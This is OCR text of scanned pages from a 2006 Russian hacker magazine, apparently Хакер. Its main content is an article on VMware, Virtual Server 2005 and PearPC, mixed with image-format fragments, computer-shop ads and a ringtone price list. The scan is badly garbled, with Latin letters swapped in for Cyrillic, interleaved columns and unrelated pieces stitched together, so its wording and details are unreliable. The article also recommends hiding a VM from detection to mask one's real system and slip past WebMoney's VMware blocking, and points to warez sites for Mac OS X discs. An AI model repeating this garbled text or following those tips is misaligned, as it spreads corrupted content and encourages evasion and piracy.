дакторов изображений считала своим долгом создать свой 
файловый тип, а то и не один, однако это не означает, что 
«все нужно сохранять в ТІРР, а сжимать бРЕѲ'ом». Каждый, из 
утвердившихся сегодня форматов, прошел естественный от- 
бор, доказал свою жизнеспособность и полезность. Все они 
имеют какие-то характерные особенности и возможности, де- 
лающие их незаменимыми в работе. Знание особенностей, 
тонкостей технологии важно для современного дизайнера так 
же, как для художника необходимо разбираться в различиях 
химического состава красок, свойствах грунтов, типов метал- 
лов и породах дерева. Главное — веселые картинки всем, да- 
ром, и пусть никто не уйдет обиженным! 

ВИШНУ ѴОІІН’8 нс 
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В настоящее время ѴѴаѵсІсГ нашли свое динении и разделении сигналов, мно- 

применение в области цифровой обра- жественном доступе, при использова- 

_ ботки сигналов: сжатии изображений, нии скрьиой связи, в мультиплексорах, 

ОЪЛАСу I И в области очистки сигналов от шумов, при совместном кодировании источ- 

гтттз ігттгттттгг П Р И часго_то “ в Р емешюм анализе сиг- пика и канала связи, при выделении 

1 1 Р гі ЛТ Ъ Н К Н ИТІ ^ налов. ѴѴаѵеІеі: применяется при выде- сигналов на фоне шумов. Как это ни 

I Ленин локальньи свойств, распознава- странно, но ѴѴаѵеІеТ-сжатие использу- 

ѴѴАѴЪРЪ I нии и классификации сигналов, в ме- ется и в медицине (для анализа элекг- 

дицинских приложениях. Широко ис- рокардиограмм) и при этом считается 

пользуется и в отрасли связи при обье- весьма перспективным направлением. 




Не очень приятным свойством 
1РЕС является то, что нередко гори- 
зонтальные и вертикальные полосы 
на дисплее абсолютно не видны и 
могут проявиться только при печати 
в виде муарового узора. Он возника- 
ет при наложении наклонного раст- 
ра печати на горизонтальные и вер- 
тикальные полосы изображения. 
Из-за этих сюрпризов |РКС> не ре- 
комендуется активно использовать в 
полиграфии, задавая высокие коэф- 
фициенты. Однако при архивации 
изображений, предназначенных для 
просмотра человеком, он на данный 
момент незаменим. 

Широкое применение ] РЕС долгое 
время сдерживалось, пожалуй, лишь 
тем, что он оперирует 24-битными 
изображениями. Поэтому для того, 
чтобы с приемлемым качеством 



посмотреть картинку на обычном 
мониторе в 256-цветовой палитре, 
требовалось применение соответ- 
ствующих алгоритмов и, следова- 
тельно, определенное время. В при- 
ложениях, ориентированных на 
придирчивого пользователя, таких, 
например, как игры, подобные за- 
держки недопустимы. Кроме того, 
если имеющиеся у вас изображения, 
допустим, в 8 -битном формате СІЕ 
перевести в 24-битный 1РЕС, а по- 
том обратно в СІР для просмотра, 
то потеря качества произойдет 
дважды при обоих преобразовани- 
ях. Тем не менее, выигрыш в разме- 
рах архивов зачастую настолько ве- 
лик (в 3-20 раз!), а потери качества 
настолько малы, что хранение изоб- 
ражений в | РЕС оказывается очень 
эффективным. 



«ІІПолюс 

Компьютеры 






Маленький город. Большой мир. 

Кзісым бы маленьким быи Ваш подмой город и как далеко ни был бы он 
расположен, с помощью достула е Интернет и процессора іліѳЗ® Рѳпііит® 4 
С іехнопогнеи НТ. на йаае которого работает компьютер 'Передовик' Ваша 
с-емья получит все преимущества новейших технологий. 



(812) 703-10-50 сетевая интеграция, ноутбуки, 
(81 2) 325-25-05 рабочие станции и периферия 







йй ГРУСТНО, ЧТО МНОГИЕ ИЗ НАС НЕ ОСОЗ- 
НАЮТ ВСЮ ВЫГОДУ ОТ ИСПОЛЬЗОВАНИЯ 
ВИРТУАЛЬНЫХ МАШИН. НЕ УСТАНАВЛИВАЮТ 
В КАЧЕСТВЕ ГОСТЕВОЙ ОС НОВЫЕ ВЕРСИИ 
НИКСОВ, С КОТОРЫМИ НАВЕРНЯКА МАЛО 
ЗНАКОМЫ (А ЗНАКОМСТВО С НИМИ НЕ ПО- 
МЕШАЕТ). НЕ ЮЗАЮТ ВИРТУАЛЬНЫЕ СИСТЕ- 
МЫ ДЛЯ МАСКИРОВКИ НАСТОЯЩЕЙ ОС В ИН- 
ТЕРНЕТЕ. НЕ ПЫТАЮТСЯ ИССЛЕДОВАТЬ 
ПРИНЦИПЫ ДЕЙСТВИЯ ВИРУСОВ И ТРОЯНОВ 
В ИДЕАЛЬНОМ КАРАНТИНЕ, КОТОРЫЙ НА 
100% ГАРАНТИРУЕТ ИЗОЛЯЦИЮ ЗАРАЗЫ. 
И СОВЕРШЕННО НАПРАСНО УПУСКАЮТ ПО- 
ДОБНЫЕ ВОЗМОЖНОСТИ! рр 



РС 2 О N Е ///// ІЗЗУЕ 




ТЕХТ СТЕПАН ИЛЬИН, ОН ЖЕ СТЕПА, ОН ЖЕ СТЕР / 5ТЕРСДМЕІ.ЛМО.КІІ / 



КЛАССИКА 

ѴМѴѴАВЕ 



Я не совру, если скажу, что ѴМѵѵаге — это наиболее попу- 
лярное средство для создания виртуальных машин. Мы, 
восторгаясь, писали о нем несколько лет назад — точно 
так же пишем и сейчас. Конечно, многое с тех пор измени- 
лось, но основная цель — создание идеальной платформы 
для установки гостевых ОС. На сегодняшний день в линей- 
ке продуктов ѴМѵѵаге предлагается не одна программа, а 
сразу несколько. Среди ѴМѵѵаге ѴѴогкзІаІіоп, ѴМѵѵаге ЕЗХ 
Зегѵег, ѴМѵѵаге ѴігІиаІСепІег и других разработок нас, 
прежде всего, интересует именно версия ѴѴогкзІаІіоп. Сер- 
верные вариации, безусловно, предоставляют пользова- 
телю более широкие возможности, но ощутить эти прелес- 
ти удастся, к сожалению, только на мэйнфреймах. Как ни 
крути, а та же оптимизация под 2- или 4-процессорные 
системы едва ли пригодится тебе в повседневной работе. 
Перед тем как описывать возможности ѴМѵѵаге, неплохо 
было бы разобраться, что вообще собой представляет вир- 
туальная машина. По сути, виртуальная машина — это ис- 
кусственно созданная среда, которая в точности эмулиру- 
ет работу полноценного компьютера. Установленная на та- 
кую машину операционка доверчиво полагает, что работа- 
ет на самом обыкновенном компьютере и поэтому ни в чем 
не ограничивает пользователя. В то же время способы эму- 
ляции необходимых девайсов сильно разнятся в зависи- 
мости от используемого софта. ѴѴМѵѵаге использует осо- 
бенный путь: в качестве платформы для гостевых ОС она 
генерирует компьютер на базе «фирменного» оборудова- 
ния: видеокарты ѴМѵѵаге Іпс [ѴМѵѵаге ЗѴОА II] РСІ Оізріау 
Абаріег, сетевые карты АбѵапсесІ Місго Эеѵісез [АІѴТО] 
79с970 [РСпеІ 32 І_АЫСЕ], жесткие диски ѴМѵѵаге Ѵігіиаі ГОЕ 
Нагб Огіѵе (или ѴМѵѵаге ЗСЗІ Нагб Огіѵе) и т.д. Известно, что 
операционные системы со скрипом устанавливаются на 
экзотическом оборудовании, часто дают сбой из-за отсут- 
ствия нормальных драйверов или, вообще, намертво зави- 
сают и отказываются работать. Но это не наш случай! Во- 
первых, оборудование ѴМѵѵаге виртуально построено на 
самых распространенных моделях и чипсетах, поэтому по- 
добрать работающий драйвер, как правило, не составляет 
труда. А во-вторых, ОС автоматически распознает девайсы 
ѴМѵѵаге и отлично взаимодействует с ними. Деталь, впро- 
чем, ничуть не удивительная с учетом той популярности, ко- 
торую имеет сейчас система. 

Создание виртуальной машины осуществляется всего за 
несколько секунд. И без того простой процесс облегча- 
ет специальный мастер, который полностью руководит 
твоими действиями. От тебя требуется лишь указать тип 
ОС, желательно конкретную ее версию, рабочую папку, 
в которой будут размещаться системные файлы, а также 
размер виртуального жесткого диска. Проблемы могут 
возникнуть на этапе конфигурации сети, поэтому разбе- 
рем его подробнее. Мастер потребует от тебя выбрать 
один из трех пунктов: 

ІІзе Ьгібдеб пеіѵѵогкіпд. В этом случае виртуальная маши- 
на станет полноценным членом сети со своим собствен- 



ным ІР-адресом и будет работать наравне со всеми ос- 
тальными клиентами. 

ІІзе ЫАТ. При выборе этого пункта активизируется система 
трансляции сетевых адресов (Ыеіѵѵогк Аббгевз Тгапзіаііоп), 
то есть гостевая ОС будет находиться за МАТ’ом. Она смо- 
жет работать в Интернете, но обратиться к ней напрямую 
останется невыполнимой задачей, так как за пределами 
ІЧАТ’а она будет иметь тот же ІР, что и хост-машина. 

ІІзе Нозі-опіу пеіѵѵогкіпд. Этот вариант подойдет, если вы- 
ход во внешнюю сеть (Интернет) не требуется, при этом 
достаточно связи между гостевой ОС и хост-машиной. 

Оо поі изе а пеіѵѵогк соппесііоп. Сеть использоваться не будет. 
В большинстве случаев идеально подойдет первый вари- 
ант, но в любом случае отталкиваться следует от конкрет- 
ной ситуации. После того как виртуальная машина созда- 
на, можно приступать к установке на нее ОС. К счастью, 
никаких проблем здесь возникнуть не должно, поскольку 
процедура в точности повторяет обычную установку на 
жесткий диск. 

Для запуска виртуальной машины можно воспользоваться 
самой ѴѴМѵѵаге ѴѴогкзІаІіоп или же специальным проигры- 
вателем ѴМѵѵаге РІауег, по умолчанию включенным в дист- 
рибутив программы. Признаться, когда я впервые прочи- 
тал о его предназначении, то подумал: «Какая бесполез- 
ная вещь!». ѴМѵѵаге РІауег не умеет ни создавать, ни наст- 
раивать, ни модифицировать виртуальные машины — он 
может лишь запускать их. Что с этого толку? Но вскоре 
оказалось, что РІауег отнюдь не настолько бесполезен, 
как это может показаться на первый взгляд, и толк в его 
использовании действительно есть. Суди сам: большую 
часть времени пользователь тратит именно на эксплуата- 
цию готовых виртуальных машин, а не на создание новых 
или настройку существующих. Тогда зачем использовать 
ѴѴМѵѵаге ѴѴогкзІаІіоп, которая нагромождена всевозможны- 
ми компонентами и, что логично, работает медленнее, чем 
обычная программа? Значительно удобнее будет неболь- 
шая программа, которая имеет тот самый минимум функ- 
ций, который всегда может понадобиться. ѴМѵѵаге РІауег 
поддерживает 32- и 64-битовые гостевые операционные 
системы, легко справляется с настройкой сети (на базе 
мостов и МАТ) и понимает файлы с виртуальными машина- 
ми Місгозоіі Ѵігіиаі РС и Ѵігіиаі Зегѵег, а также образы 
Зутапіес ЫѵеЗіаІе Весоѵегу. Более того, ѴѴМѵѵаге РІауег в 
любой момент может приостановить работу виртуальной 
системы, а потом в любой момент продолжить ее с точки 
останова, восстановив параметры из специального сним- 
ка системы (зпарзігаі’а). Ждать каждый раз загрузки 
Ипих'а на виртуальной системе — занятие довольно-таки 
утомительное. Держать гостевую ОС постоянно в памяти 
накладно. В то же время поддержка зпарзіюі'ов пол- 
ностью решает эту проблему: мне достаточно нажать на 
ярлык ѴѴМѵѵаге РІауег’а, и уже через несколько минут в мо- 
ем распоряжении окажется готовая к работе система. 



042 



ХАКЕР 03 /87/ 06 



т ш.іоііу.ги 




Будь 

ИЗ 7 70І||| 

к Звуки и музыка 




Реалтоны 

Не плюй в телефон, плевалку заплюешь ■ 
Телефон находится в режиме вибрации ■ ■ 
Бой курантов 



Возьми тррубку я тебе говорю! Скажи аллеее!!! (злой босс) ■ 



46433546 
46438546 
57773546 
.51171546 
46351546 
.51174546 

46453546 

Дорогой, поиграй с моими кнопками! 46459546 

Пет я хороший! Руки прочь! Попугай 46460546 

Сейчас ты у меня заговоришь! 46456546 

Земля-земля, прием-прием! ” 46451546 

Выключай свет и вибрацию! 46735546 

Зачем нам кузнец (полная). . . 46474546 

Тикайте хлопцы, ІТІ Ье Ьаск 46450546 

Вижу выражение твоего лица. 

^е?полишн?тя 'пеанка (Уно момента) (из к/ф Формула любви) <™2546 

I с тенью (тема из к/ф Бой с тенью) 47141546 

:идіо -Улетаю ... 47151546 

47740546 

ф-ТікеЧкекагді 47730546 

ня Остапа Бендера (из к/ф 12 стульев) 47724546 

іриконсы - Солдаты (т/с Солдаты) 47117546 

а2гтаН- Ночной дозор ..47773546 

ентльмены Удачи (из к/ф Джентльмены Удачи 47122546 

Іаго-Сгаіу 47752546 

/аде-СоодЬуе 47775546 

акли- Капля абсента 47739546 

о Сиіидпо - Піаііапо 47746546 

апді-5(отр (изк/фЖмурки) 47787 546 

реая песня Разбойников из м/ф Бременские музыканты 47Ш546 

гри- Рома, извини! ..48222546 

ери -До скорой встречи ...47705546 

ери -Районы-Кварталы 47638546 

егаіііса - ТЬе 47634546 

еоТЬазе-ВеаиіКиІМе .47106546 

ІоЪчІйиЬ- Смуглянка ...47639546 

юсаІурЧса - 47642546 

47640546 

теуМ-НіѵепОПЗаЬуІоп 47666546 



ЛРЗ 47453546 

пла - Учкудук три колодца 47275546 

штор-2 - Красавица 47377546 

-Моде - В мире животных ' ' 4б55554б 

Многоточие - Щемит в душе тоска 47392546 

Іракли - Вова-чума 47346546 

еЛех-Сойтисума 4 47348546 

уки вверх - Наташа (Еиюреап далее тіх) 47344546 

ІеЛех - Падали звезды 47273546 

пюк':)іа - Швайне 47439546 

пріех ѵз Аросаіірііса - Бой с тенью 47445546 

'.лава -Попутчица ...47394546 

Іракли - Капли абсента 47449546 

люкоза - Снег идет 47370546 

Зерка Сердючка - Тук, тук, тук 47357546 

ЗиІсБ - Небо над Москвой 47065546 

Звери - Рома, извини! (длинная версия) ■ 48333546 

Звери -До скорой встречи 48116546 

Іп-Сгід - Мата Міа .. .48114546 

Іп-Сгід - Тт РоІІе РеТоі 47277546 

Х-тоде Что? Где? Когда? 48113546 

КМС Геаі 5 апду - СеХ Веііег • • 48224546 

Моральный кодекс - Первый снег 47457546 

ІдоЬ зіІдиЬ - Смуглянка 48219546 

Кукрыниксы - 9-я рота 46823541 

МкоТіп - 5 

Проверь совместимость своего телефона и объекта на «ар.]о11у.ги/со<1е 
Отправь 5М5 с кодом цветной картинки, реалтона или мелодии 
наномер игры на номер , спецпредложения на номер 

о - 025 у. е.; для 1231 - 0,25 у. е.; для 3130-2 у. е. без НДС. 

Тонную рублевую с™|М 

по телефону 8 (495) 980-44-87, на сайтах ѵѵарооііу.ги, ѵляѵфііу.ги, терминалах 
мобильного контента 

В случае ошибочного запроса услуга считается оказанной! 

8(495)786-65-87. , „птис игг 

Операторы: МТС, Билайн, Мегафон, СМАРТС (Самара, Астрахань, Волгоград), МОТИВ, НСС. 



.47747546 
.47757546 
.47740546 
. 47730546 
.47724546 
.47777546 
.47773546 
. 47722546 
.47752546 
. 47775546 
.47739546 
,47746546 
,47787546 
.47063546 
.48222546 
.47705546 
.47638546 
...47634546 
.47106546 
...47639546 
. . . 47642546 
. . 47640546 
. . . 47666546 
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Определить использование ѴМшге очень просто. Но когда речь идет о никсовой версии ѴѴМшге. от этого недостатка виртуальной машины 
можно быстро избавиться. Для этого нужно воспользоваться небольшим патчем НіІІоѴ/ІюпеѵпеІ.гзІаск.ога/ІооІз/ѵпюаІсІі.сІ. 

Он был специально разработан для НопеѵооІ'ов. чтобы хакеры и вирусы не могли определить западню. 



Небольшой экскурс в историю. Те, кто начинал следить за 
развитием виртуальных машин несколько лет назад, пом- 
нит успехи компании Соппесііх. Удалые программеры нас- 
только успешно разрабатывали и продвигали свой про- 
дукт Ѵігіиаі РС, что в 2003 году сама Місгозоіі не поскупи- 
лась и за большие деньги купила полные права на даль- 
нейшее развитие системы. А заодно лишила Ѵігіиаі РС 
поддержки гостевых ОС на базе ІІпіх (видимо, на всякий 
случай). Чуть позже Місгозоіі анонсировала новый про- 
дукт — Ѵігіиаі Зегѵег 2005. Он является логическим разви- 
тием Ѵігіиаі РС и в настоящий момент проходит бета-тести- 
рование, но уже сейчас зарекомендовал себя с самой хо- 
рошей стороны, поэтому о нем и поговорим. 

Ѵігіиаі Зегѵег, в отличие от ѴМѵѵаге, работает, как обычная 
программа, а представлен в системе в виде службы 
ѴѴІпсіоѵѵз 2003/ХР. Это накладывает серьезное ограниче- 
ние, поскольку любая другая ОС в качестве хостовой выс- 
тупать не сможет. Более того, все файлы, относящиеся к 
каждой из виртуальных машин, должны строго распола- 
гаться на разделах І4ТЕЗ. Это особенно критично, пос- 
кольку Ѵігіиаі Зегѵег активно использует особенности этой 
файловой системы, в том числе квоты и разрешения. 
Считается, что установить на Ѵігіиаі Зегѵег возможно только 
операционки на базе винды. Однако после недолгого изу- 
чения документации выяснилось, что заинсталлить можно 
все, что угодно, главное, чтобы это было в рамках архитек- 
туры І386. Более того, разработчики системы утверждают, 
что к выходу финальной версии поддержка других гостевых 
ОС, в том числе Біпих'а, будет официальной. Сейчас же к 
подобным авантюрам нужно относиться с осторожностью. 
Пускай хост-машине ты никак не навредишь, но зато риску- 
ешь подпортить себе настроение и нервы во время уста- 
новки на Ѵігіиаі Зегѵег, скажем, последнего релиза РгееВЗО. 
Я склонен верить, что в будущем подобная проблема будет 
полностью решена. Хотя бы потому, что для виртуальных 
машин Ѵігіиаі Зегѵег эмулирует реально существующее же- 
лезо, на базе распространенных чипсетов и архитектуры. 
В частности, видеокартой в виртуальной машине выступа- 
ет известнейшая 33 Тгіо32/64, а в качестве сетевого адап- 
тера — Іпіеі 21140 РСІ Разі ЕІРіегпеІ Абаріег. Драйвера для 
подобных девайсов по умолчанию найдутся в любой ОС, а 
значит, можно рассчитывать на 100% совместимость. 
Помимо перечисленного, Ѵігіиаі Зегѵег легко эмулирует ЮЕ- 
и ЗСЗІ-устройства, причем виртуальные разделы гостевых 
ОС хранятся в специальных файлах. Файлы так и называют- 
ся — Виртуальные Жесткие Диски (Ѵігіиаі Нагб Оізк, *.ѴНЮ). 
Они включают в себя как файловую систему с установлен- 
ной ОС, программами и прочими файлами, так и техничес- 
кую информацию с описанием состояния виртуального про- 
цессора на случай, если система была приостановлена во 
время работы. Функция создания снимков системы и вос- 
становление ее работы с момента останова реализована на 
твердую пятерку и работает на ура. В качестве сменных но- 



сителей (это прежде всего относится к СО-ВОМ), могут выс- 
тупать как реальные устройства, так и просто ІЗО-образы 
дисков. Поэтому для установки гостевой системы достаточ- 
но примонтировать образ с ее дистрибутивом. 
Конфигурирования сети — это традиционно отдельный 
вопрос, но здесь, в отличие от ѴМѵѵаге, он не вызывает 
столько затруднений. Пользователь вправе соединить вир- 
туальные машины между собой или же подключить их к 
внешним физическим и виртуальным интерфейсам хост- 
машины. При этом никто не мешает подключить виртуаль- 
ные системы к внешнему интерфейсу, используя возмож- 
ности ЭНСР/ПАТ. Если в ѴМѵѵаге МАС-адреса сетевых ин- 
терфейсов были статическими, причем каждый раз одина- 
ковыми (по этой причине приложения могли легко распоз- 
нать использование виртуальной машины), то в случае 
Ѵігіиаі Зегѵег МАС-адрес можно легко установить вручную 
или включить опцию динамического распределения. 

Для того чтобы взаимодействие между основной (хосто- 
вой) и гостевой машинами проходило максимально гладко 
и комфортно, разработчики рекомендуют установить спе- 
циальное средство — Ѵігіиаі МасИіпе Аббіііопз. После ус- 
тановки существенно ускорится вывод на виртуальный 
десктоп, а переключение между виртуальным и реальным 
экранами будет проходить значительно проще (попробуй 
и поймешь, о чем я говорю). 

Вспоминая об уникальных особенностях, хочется отме- 
тить систему удаленного управления виртуальными ма- 
шинами. Воя прелесть этой возможности в том, что уп- 
равление осуществляется через обычный веб-браузер, 
то есть фактически из любой точки мира! В качестве ос- 
новы используется сочетания веб-сервера 133, а также 
динамических страниц на базе АЗР (Асііѵе Зегѵісе Радев) 
с мощными вкраплениями АсІіѵеХ-компонентов. Благода- 
ря последним разработчикам на веб-странице удалось 
воссоздать виртуальный экран, на котором отображает- 
ся десктоп гостевой операционной системы. Штука 
действительно офигенная — спору нет. Еще одним впе- 
чатляющим средством системы является технология 
ѴѴІпсіоѵѵз Зсгірііпд Нозі, позволяющая администратору 
создавать собственные скрипты для автоматизации мно- 
гих действий. За счет встроенной системы событий 
(включение ВМ, восстановление из приостановленного 
состояния, выключение с сохранением, выключение без 
сохранения и т.д.) можно создать самые разнообразные 
скрипты, которые будут полностью управлять виртуаль- 
ной машиной. Чтобы осознать реальную мощь этой сис- 
темы, рекомендую посмотреть на те скрипты, которые 
поставляются с Ѵігіиаі Зегѵег по умолчанию. 

Если возникнут трудности с настройкой РеагРС. то 
внимательно изучи сайты ѵѵѵѵѵѵ.реагрс.пеі и шл/ѵ.етасиіаііоп.сот. 
В большинстве случаев ты найдешь ответ на свой вопрос. 




НОВЫЕ 
ВОЗМОЖНОС- 
ТИ ѴІРГШАБ 
ЗЕВѴЕВ 
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Открой для себя 

новую 

реальность 



Репіішп'4 НТ 
іпзіде™ 



Благодаря компьютеру Ріехігоп ѴІР 
на базе процессора Іпіеі® Репііит® 4 
с технологией НТ Вы сможете 
насладиться реалистичными 
компьютерными играми. 



САЛОНЫ-МАГАЗИНЫ: СЕРВИС-ЦЕНТР: 

ст.м. "Бабушкинская", ул. Сухонская, 7А (495)105-6447 ст.м. "Бабушкинская", ул. Молодцова, 1 (495)105-6447 

ст.м. "Улица 1905 года", ул.Мантулинская, 2 . . .(495)105-6445 ФОТО ИНТЕРНЕТ КАФЕ: 

ст.м. "Владыкино", Алтуфьевское ш., 16 (495)105-6442 ст.м.”Владыкино", Алтуфьевское ш., 16 (495)105-6441 




3000 наименований товаров Самый выгодный кредит за 15 мин. Время работы: 10-20, без выходных Бесплат- 
ная доставка* Удобная автостоянка Резервирование товара через интернет Пункт обмена валюты Оплата кре- 
дитными картами Подарки покупателям Соответствие стандартам Техническая поддержка Магазин аксессуа- 
ров Магазин компьютерной литературы Обучающий курс для работы на ПК в комплекте і 4 

* полную информацию о товарах и услугах в конкретных магазинах компании «Ф-Центр» уточняйте на сайте ѴѴѴѴ ѴѴ.ГСбПІбГ.ГІІ 



Іпіеі, логотип Іпіеі, Іпіеі Іпзісіе, логотип Іпіеі Іпзісіе, Іпіеі Сепігіпо, логотип Іпіеі Сепігіпо, Сеіегоп, Іпіеі Хеоп, Іпіеі ЗреейЗІер, Ііапіит, Репііит и Репііит III Хеоп являются товарными знаками или заре- 
гистрированными товарными знаками корпорации Іпіеі и ее подразделений в США и других странах. 




интернет-магазин 




ѵѵѵѵѵѵЛсепіег.ги 
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«мм.ѵіттаге.сот — продукты из серии ѴМчѵаге. 
ѵуѵуѵу.тісгозоіі.сот/цѵіпііоѵуззегѵегвѵвіет/ѵігіиаівегѵег — 
официальный сайт МісгозоН Ѵігіиаі 5егѵег 2005. 
Ілир://реагрс.зоигс8Іогоѳ.пе1 — сайт разработчиков РѳагРС. 



РЕАВРС — 
РОѴѴЕВРС 
АВСНІТЕСТШЕ 
ЕМЛАТОВ 



Ранее рассмотренные программы — ѴМѵуаге и Ѵігіиаі РС — 
являются программно-аппаратными виртуальными машина- 
ми. Это значит, что они программно эмулируют виртуальное 
оборудование для гостевых ОС, но в то же время жестко 
привязаны к реальному аппаратному комплексу и использу- 
емой х86 архитектуре. Другими словами, большая часть 
операций на виртуальной машине выполняется непосред- 
ственно оборудованием компьютера, что называется «как 
есть». С точки зрения быстродействия виртуальных машин, 
такой подход выгодно смотрится, но в то же время наклады- 
вает серьезные ограничения на виды ОС, которые могут 
выступать в качестве гостевых. На базе ѴМѵуаге и ѴігІиаІРС 
можно запустить ѴѴІпсіоуѵз, 1_іпих, ВЗЭ и любые другие ОС, 
предназначенные для компьютеров х86 архитектуры, одна- 
ко на этом список заканчивается. Об установке, скажем, 
Мае ОЗ X, которая, возможно, тебя интересует больше все- 
го, придется забыть, поскольку эта красивая и надежная 
ОС работает на другой платформе — Роѵѵег РС. 

Столь серьезное ограничение снимает целиком програм- 
мные виртуальные машины. Одна из них — программа 
РеагРС, название которой идет от РоѵѵегРС АгсИІІесІиге 
Етиіаіог (эмулятор архитектуры РоѵѵегРС). Только предс- 
тавь: разработчикам удалось реализовать инструмент для 
эмуляции совершенно другой архитектуры. Другой! Со сво- 
ими собственными регистрами, набором машинных 
инструкций, организацией памяти и т.д. Это значит, что вир- 
туальный процессор должен выбрать каждую машинную 
команду РоѵѵегРС, дешифровать ее, чтобы понять, для чего 
она предназначена, а затем выполнить эквивалентную 
подпрограмму, составленную из х86 инструкции. При этом 
он должен в точности эмулировать все флаги, регистры и 
внутреннее арифметико-логическое устройство, чтобы иск- 
лючить возможные расхождения в результатах. Приклоняю 
колени перед разработчиками, которые не только реализо- 
вали подобную штуковину, но и совершенно бесплатно 
выставляют плоды своего гения на всеобщее обозрение. 
РеагРС распространяется с открытыми исходниками. 
Эмулятор может быть запущен на большинстве РОЗІХ-Х11 
операционках (прежде всего, Ііпих) и, конечно же, ѴѴІпбоѵѵз. 
Что касается гостевой ОС, то в ее качестве были успешно 
протестированы Мапбгаке І_іпих 9.1 Іог РРС, Эагѵѵіп Іог РРС и, 
конечно же, Мае ОЗ X 10.3. Для их полноценной работы 
РеагРС эмулирует все необходимое аппаратное обеспечение: 

* СРІІ ЛТС-Х86: одна из модификаций процессора 63. Вир- 
туальная машина на лету преобразует инструкции 
РоѵѵегРС в инструкции х86. Часть из них кэшируется, бла- 
годаря чему достигается существенное увеличение в ско- 
рости. Но даже с учетом этих ухищрений гостевая ОС бу- 
дет работать медленнее, чем хостовая. 

* РСІ-мост, ІІЗВ, контроллер прерываний, клавиатура и 
мышь, являющиеся неотъемлемой частью любой машины. 

* ЮЕ-контроллер, позволяющий подключить жесткий диск 
и СЭ-ВОМ из файлов-образов хостовой системы 

* Виртуальный ЕІИегпеІ-контроллер, эмулирующий 
ЗСОМ ЗСЭОх или РіеаІТек 8139 для организации сетевых 
подключений. 

Для комфортной работы в гостевой ОС требования, как 



несложно догадаться, предъявляются довольно серьез- 
ные. Без 512 Мб оперативной памяти и пары ГГц процес- 
сора едва ли стоит вообще пробовать устанавливать Мае 
ОЗ X. В противном случае попросту рискуешь подпортить 
себе настроение. Кстати, процедура установки гостевой 
ОС не так прозрачна, как в случае с двумя предыдущими 
продуктами. Настройка осуществляется через текстовый 
конфигурационный файл, что может вызвать некоторые 
затруднения. Чтобы этого избежать, предлагаю рассмот- 
реть процесс установки на примере Мае ОЗ X. 

1 Для начала стоит распаковать архив с программой 
( реагрс-0.4-міп32-ІІІс.2Ір ), а также архив с файлом-образом 
жесткого диска (реагрс-ЗдіЬ.ітд.Ьі2) в какую-нибудь пап- 
ку, например С:\РеагРС. 

2 Далее нам потребуются диски с дистрибутивом МасОЗ X. 
К сожалению, в свободном доступе их найти не удастся, но 
зато на варезных ресурсах они присутствуют в изобилии. 
Единственная загвоздка в том, что Мае использует для СО- 
дисков особую файловую систему, которую не понимает 
ѴѴІпсІоѵѵз. Чтобы наладить контакт придется либо преобра- 
зовать образы в понятный для винды вид (это можно сде- 
лать с помощью программы АІсоИоІ 120%), либо подружить 
винду и файловую систему Мас’ов (для этого подойдет ути- 
лита МасЭгіѵе) 

3 Теперь, что касается конфигурирования. Пример тексто- 
вого конфига находится в файле ррссід.ехатріе, однако в 
него необходимо внести некоторые коррективы. 
ррс_зІагІ_гезоіиІіоп = «1024x768x32» 

С помощью этого параметра задаются разрешение и глу- 
бина света окна эмулятора. При необходимости через знак 
@ можно указать вертикальную развертку экрана. 
ргогтЦэооІтеІІтосІ = «зеіесі». 

Определим ручной метод загрузки: во время запуска вир- 
туальной машины ты сам сможешь выбирать загрузочное 
устройство. Это необходимо для того, чтобы загрузится с 
СЭ и начать установку ОС. 

тетогу_зіде=0х1 0000000 — этот параметр задает количе- 
ство оперативной памяти, выделяемой виртуальной маши- 
не (в данном случае 256). По умолчанию для гостевой ОС 
резервируется 128 Мб, однако этого явно недостаточно. 
рсі_ібеО_тазІег_іпзІаІІесІ = 1 
рсі_ібе0_таз1ег_ітаде = «реагрс-ЗдіЬ.ітд» 
рсі_ібе0_таз1ег_1уре = «Иб» 

Определим файл-образ для виртуального жесткого диска 
рсі_ібеО_8Іаѵе_іпвІаІІеб = 1 
рсі_ібеО_зіаѵе_іппаде = «озх_сб1.ізо» 
рсі_ібе0_зіаѵе_1уре = «сбгот» 

Подключим СО-ВОМ и примонтируем к нему образ первого 
установочного диска МасОЗ X. 
рсі_Ш8139_іпз1аІІесі = 1 
рсі_Ш8139_тас = «бе:аб:са:(е:12:35» 

Активируем сеть (адаптер на базе Веаііек 8139) и опреде- 
лим для него МАС-адрес 

4 Сохраняем конфиг и приступаем к запуску РеагРС. Для 
этого в командной отроке набери: 

сб сЛреагрс 
ррс.ехе ррссід.ехатріе 



Кто-то, возможно, почешет репу и спросит: «Так какая виртуальная машина лучше?». Однако ответ на этот вопрос не может 
быть однозначным и напрямую зависит от того, что ты от этой виртуальной машины хочешь. Если требуется площадка для ус- 
тановки и экспериментов с ІІпіх-системами из винды или, наоборот, с ѴѴІпбоѵѵз-системами из-под никсов, то универсальная 
ѴМѵѵаге — это именно то, что нужно. В случае, когда есть необходимость в гостевой ѴѴІпбоѵѵв-системе (например, для маски- 
ровки параметров своей настоящей), я настоятельно рекомендую к использованию Ѵігіиаі Зегѵег. Во-первых, он предоставля- 
ет массу полезных фишек (возможность удаленного администрирования и автоматизация на базе скриптов), а во-вторых, его 
использование не так просто выявить программными средствами. Это особенно актуально, поскольку несколько дней назад 
администрация ѴѴеЬппопеу начала блокировать все неаттестованные кошельки, работа с которыми ведется через ѴѴМѵѵаге. 
Что касается бесплатного РеагРС, то он как нельзя лучше подходит для установки Мае ОЗ X. Юзай на здоровье! 

шидву ѵоик'8 зс 
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В линейке продуктов ѴУМѵѵаге существует специальное приложение, 
которое поможет переместить реально установленную операционную 
систему в виртуальное окружение. Ее имя ѴМшге Р2Ѵ Аееізіапі. 




ѴМѵѵаге под линуксом. 
Лепота! :) 



мутная настройка сети 
в ѴМѵѵаге 




КЭЕ отлично работает на 
виртуальной машине, 
пускай и медленно... 



мастер полностью 
руководит процессом 




ѴМѵѵаге РІауег запущен. 
Осталось указать образ 
виртуальной машины 



установка Ѵігіиаі Зегѵег 
2005 




конфигурирование госте- 
вой ОС — все действия 
осуществляются через 
браузер 



установка ѴѴІпбоѵѵз 2000 
Зегѵег 




полностью 
работоспособная 
виртуальная машина 



МасОЗ X под виндой - 
это реально! 




Не стоит забывать о возможных уязвимостях виртуальных ма- 
шин. Например, совсем недавно в участке кода ѴМшге. кото- 
рая отвечает за реализацию ІМАТ'а. была найдена серьезная 
дыра. Обидная бага позволяла приложениям выполнять про- 
извольный код на хостовой машине. 





ЭОпт вРІІ 



КХ1 600ХТ-Т20256Е 



• Мощный графический процессор РАОЕОЫ™ 

